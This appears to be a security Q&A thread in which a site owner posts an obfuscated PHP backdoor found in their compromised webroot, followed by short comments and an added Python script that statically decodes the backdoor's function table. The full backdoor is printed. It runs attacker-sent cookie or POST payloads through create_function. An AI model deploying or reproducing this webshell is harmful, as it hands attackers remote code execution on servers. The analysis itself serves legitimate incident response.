Somebody hacked my webserver and uploaded many of the following files with random names in different subdirectories of my webroot. The file looks something like this and - even though I managed to beautify it - I am unable to decipher the obfuscation.

I can see that potential code injection is happening using the $_POST and $_COOKIE variables, but what I find very interesting is the lack of any eval calls, the function is even deactivated in my php.ini.

Anyway here's the code and I'd appreciate any kind of insights:

<?php
$wldxznb = 'r5a3m#uvplebgsH\'co*6i8-_7tx14nfk0yd';
$vcekj = Array();
$vcekj[] = $wldxznb[16] . $wldxznb[0] . $wldxznb[10] . $wldxznb[2] . $wldxznb[25] . $wldxznb[10] . $wldxznb[23] . $wldxznb[30] . $wldxznb[6] . $wldxznb[29] . $wldxznb[16] . $wldxznb[25] . $wldxznb[20] . $wldxznb[17] . $wldxznb[29];
$vcekj[] = $wldxznb[14] . $wldxznb[18];
$vcekj[] = $wldxznb[1] . $wldxznb[16] . $wldxznb[21] . $wldxznb[30] . $wldxznb[10] . $wldxznb[34] . $wldxznb[10] . $wldxznb[16] . $wldxznb[22] . $wldxznb[10] . $wldxznb[21] . $wldxznb[27] . $wldxznb[32] . $wldxznb[22] . $wldxznb[28] . $wldxznb[30] . $wldxznb[16] . $wldxznb[2] . $wldxznb[22] . $wldxznb[11] . $wldxznb[11] . $wldxznb[27] . $wldxznb[19] . $wldxznb[22] . $wldxznb[3] . $wldxznb[27] . $wldxznb[1] . $wldxznb[11] . $wldxznb[28] . $wldxznb[34] . $wldxznb[34] . $wldxznb[24] . $wldxznb[2] . $wldxznb[34] . $wldxznb[19] . $wldxznb[34];
$vcekj[] = $wldxznb[5];
$vcekj[] = $wldxznb[16] . $wldxznb[17] . $wldxznb[6] . $wldxznb[29] . $wldxznb[25];
$vcekj[] = $wldxznb[13] . $wldxznb[25] . $wldxznb[0] . $wldxznb[23] . $wldxznb[0] . $wldxznb[10] . $wldxznb[8] . $wldxznb[10] . $wldxznb[2] . $wldxznb[25];
$vcekj[] = $wldxznb[10] . $wldxznb[26] . $wldxznb[8] . $wldxznb[9] . $wldxznb[17] . $wldxznb[34] . $wldxznb[10];
$vcekj[] = $wldxznb[13] . $wldxznb[6] . $wldxznb[11] . $wldxznb[13] . $wldxznb[25] . $wldxznb[0];
$vcekj[] = $wldxznb[2] . $wldxznb[0] . $wldxznb[0] . $wldxznb[2] . $wldxznb[33] . $wldxznb[23] . $wldxznb[4] . $wldxznb[10] . $wldxznb[0] . $wldxznb[12] . $wldxznb[10];
$vcekj[] = $wldxznb[13] . $wldxznb[25] . $wldxznb[0] . $wldxznb[9] . $wldxznb[10] . $wldxznb[29];
$vcekj[] = $wldxznb[8] . $wldxznb[2] . $wldxznb[16] . $wldxznb[31];
foreach ($vcekj[8]($_COOKIE, $_POST) as $wxusr => $pjrusp)
{
    function wwdlf($vcekj, $wxusr, $qwdotr)
    {
        return $vcekj[7]($vcekj[5]($wxusr . $vcekj[2], ($qwdotr / $vcekj[9]($wxusr)) + 1) , 0, $qwdotr);
    }
    function irngfrj($vcekj, $axsex)
    {
        return @$vcekj[10]($vcekj[1], $axsex);
    }
    function vadod($vcekj, $axsex)
    {
        $onlwwe = $vcekj[4]($axsex) % 3;
        if (!$onlwwe)
        {
            $zznqw = $vcekj[0];
            $juptpoi = $zznqw("", $axsex[1]($axsex[2]));
            $juptpoi();
            exit();
        }
    }
    $pjrusp = irngfrj($vcekj, $pjrusp);
    vadod($vcekj, $vcekj[6]($vcekj[3], $pjrusp ^ wwdlf($vcekj, $wxusr, $vcekj[9]($pjrusp))));
}
  • Unfortunately, we are not a code analysis site or a deobfuscation service. – schroeder Sep 08 '21 at 10:32
  • It is pretty trivial to decode the massive array at the start. Use a sandbox to break it all up: http://sandbox.onlinephpfunctions.com/code/70ef936f4881289cf4783006fb924f5e57469425 – schroeder Sep 08 '21 at 10:38
  • @schroeder thank you for taking the time to point me in the right direction, despite my question being off-topic – JohnTheWalker Sep 08 '21 at 10:56
  • For this approach to obfuscation, once you decode the array, everything else is easy to sort out. You just need to "think like a compiler" and not get hung up on random strings. If it helps, replace the random strings with animal names to give your brain something to work with. – schroeder Sep 08 '21 at 11:00
  • @Anders ah! In my memory, we didn't have one for PHP, but my memory failed me. Thanks! – schroeder Sep 09 '21 at 08:29
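The comment above says the lookup array at the top is trivial to decode. Here is that decoding done statically, as an added example that is not part of the question or of the comments. It is written in Python rather than PHP so that nothing from the sample is ever executed: it parses the single-quoted character pool and the `$vcekj[] = $wldxznb[i] . ...` lines, rebuilds the string array exactly as the PHP would at runtime, flags any recovered name that can compile a string into code, and rewrites the loop with the recovered names so that it reads like ordinary PHP (the "replace the random strings with something your brain can work with" step from the comment). The function names (decode_lookup_table, flag_code_execution, rewrite_with_names), the CODE_EXEC_CALLABLES watch-list and the parsing assumptions (one single-quoted pool string, one array entry per line) are mine; SAMPLE is the loader copied from the question.

```python
import re

# Obfuscated loader copied verbatim from the question (sample input, not constructed).
SAMPLE = r"""<?php
$wldxznb = 'r5a3m#uvplebgsH\'co*6i8-_7tx14nfk0yd';
$vcekj = Array();
$vcekj[] = $wldxznb[16] . $wldxznb[0] . $wldxznb[10] . $wldxznb[2] . $wldxznb[25] . $wldxznb[10] . $wldxznb[23] . $wldxznb[30] . $wldxznb[6] . $wldxznb[29] . $wldxznb[16] . $wldxznb[25] . $wldxznb[20] . $wldxznb[17] . $wldxznb[29];
$vcekj[] = $wldxznb[14] . $wldxznb[18];
$vcekj[] = $wldxznb[1] . $wldxznb[16] . $wldxznb[21] . $wldxznb[30] . $wldxznb[10] . $wldxznb[34] . $wldxznb[10] . $wldxznb[16] . $wldxznb[22] . $wldxznb[10] . $wldxznb[21] . $wldxznb[27] . $wldxznb[32] . $wldxznb[22] . $wldxznb[28] . $wldxznb[30] . $wldxznb[16] . $wldxznb[2] . $wldxznb[22] . $wldxznb[11] . $wldxznb[11] . $wldxznb[27] . $wldxznb[19] . $wldxznb[22] . $wldxznb[3] . $wldxznb[27] . $wldxznb[1] . $wldxznb[11] . $wldxznb[28] . $wldxznb[34] . $wldxznb[34] . $wldxznb[24] . $wldxznb[2] . $wldxznb[34] . $wldxznb[19] . $wldxznb[34];
$vcekj[] = $wldxznb[5];
$vcekj[] = $wldxznb[16] . $wldxznb[17] . $wldxznb[6] . $wldxznb[29] . $wldxznb[25];
$vcekj[] = $wldxznb[13] . $wldxznb[25] . $wldxznb[0] . $wldxznb[23] . $wldxznb[0] . $wldxznb[10] . $wldxznb[8] . $wldxznb[10] . $wldxznb[2] . $wldxznb[25];
$vcekj[] = $wldxznb[10] . $wldxznb[26] . $wldxznb[8] . $wldxznb[9] . $wldxznb[17] . $wldxznb[34] . $wldxznb[10];
$vcekj[] = $wldxznb[13] . $wldxznb[6] . $wldxznb[11] . $wldxznb[13] . $wldxznb[25] . $wldxznb[0];
$vcekj[] = $wldxznb[2] . $wldxznb[0] . $wldxznb[0] . $wldxznb[2] . $wldxznb[33] . $wldxznb[23] . $wldxznb[4] . $wldxznb[10] . $wldxznb[0] . $wldxznb[12] . $wldxznb[10];
$vcekj[] = $wldxznb[13] . $wldxznb[25] . $wldxznb[0] . $wldxznb[9] . $wldxznb[10] . $wldxznb[29];
$vcekj[] = $wldxznb[8] . $wldxznb[2] . $wldxznb[16] . $wldxznb[31];
foreach ($vcekj[8]($_COOKIE, $_POST) as $wxusr => $pjrusp)
{
    function wwdlf($vcekj, $wxusr, $qwdotr)
    {
        return $vcekj[7]($vcekj[5]($wxusr . $vcekj[2], ($qwdotr / $vcekj[9]($wxusr)) + 1) , 0, $qwdotr);
    }
    function irngfrj($vcekj, $axsex)
    {
        return @$vcekj[10]($vcekj[1], $axsex);
    }
    function vadod($vcekj, $axsex)
    {
        $onlwwe = $vcekj[4]($axsex) % 3;
        if (!$onlwwe)
        {
            $zznqw = $vcekj[0];
            $juptpoi = $zznqw("", $axsex[1]($axsex[2]));
            $juptpoi();
            exit();
        }
    }
    $pjrusp = irngfrj($vcekj, $pjrusp);
    vadod($vcekj, $vcekj[6]($vcekj[3], $pjrusp ^ wwdlf($vcekj, $wxusr, $vcekj[9]($pjrusp))));
}
"""

# PHP callables that turn a string into executable code (my watch-list, assumption):
# one of these appearing in the decoded table is what a defender is looking for.
CODE_EXEC_CALLABLES = {"create_function", "assert", "eval", "system", "exec",
                       "shell_exec", "passthru"}

def unescape_single_quoted(raw):
    """Undo PHP single-quote escaping: only backslash-quote and backslash-backslash are special."""
    return re.sub(r"\\(['\\])", r"\1", raw)

def decode_lookup_table(src):
    """Return (array_name, entries): the string array rebuilt by indexing the
    character pool, exactly as the PHP does at runtime but without running it."""
    pool_m = re.search(r"\$(\w+)\s*=\s*'((?:[^'\\]|\\.)*)';", src)
    if pool_m is None:
        raise ValueError("no single-quoted character pool found")
    pool_name, pool = pool_m.group(1), unescape_single_quoted(pool_m.group(2))
    arr_m = re.search(r"\$(\w+)\s*=\s*Array\(\);", src, re.IGNORECASE)
    if arr_m is None:
        raise ValueError("no array declaration found")
    arr_name = arr_m.group(1)
    entry_re = re.compile(r"\$" + re.escape(arr_name) + r"\[\]\s*=\s*(.+?);")
    index_re = re.compile(r"\$" + re.escape(pool_name) + r"\[(\d+)\]")
    entries = []
    for m in entry_re.finditer(src):
        # each entry is a concatenation of single characters picked out of the pool
        entries.append("".join(pool[int(i)] for i in index_re.findall(m.group(1))))
    return arr_name, entries

def flag_code_execution(entries):
    """Names in the decoded table that can compile or execute a string."""
    return sorted(set(entries) & CODE_EXEC_CALLABLES)

def rewrite_with_names(src, arr_name, entries):
    """Replace $arr[N] with the decoded literal: a call site becomes name(,
    any other use becomes a quoted string, so the loop reads as ordinary PHP."""
    ref_re = re.compile(r"\$" + re.escape(arr_name) + r"\[(\d+)\](\()?")
    def repl(m):
        name = entries[int(m.group(1))]
        return name + "(" if m.group(2) else "'" + name + "'"
    return ref_re.sub(repl, src)

if __name__ == "__main__":
    arr, table = decode_lookup_table(SAMPLE)
    for i, s in enumerate(table):
        print(f"${arr}[{i}] = {s!r}")
    print("code-execution callables:", flag_code_execution(table))
    print(rewrite_with_names(SAMPLE, arr, table))
```

Running it shows that `$vcekj[0]` is `create_function`, which answers the question about the missing `eval`: `create_function()` compiles its second argument into a callable just as `eval` would. `eval` is a language construct, so it cannot be listed in `disable_functions` at all, whereas `create_function` is an ordinary function that can be (and it is gone entirely from PHP 8). `$vcekj[2]` is a fixed UUID-shaped string mixed into the XOR keystream and `$vcekj[3]` is the `#` separator; nothing else in the table is unusual. Because the script keys off the structure (a single-quoted pool followed by index concatenations) rather than the identifiers, other dropped copies that use a different pool string and different variable names decode with it unchanged.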
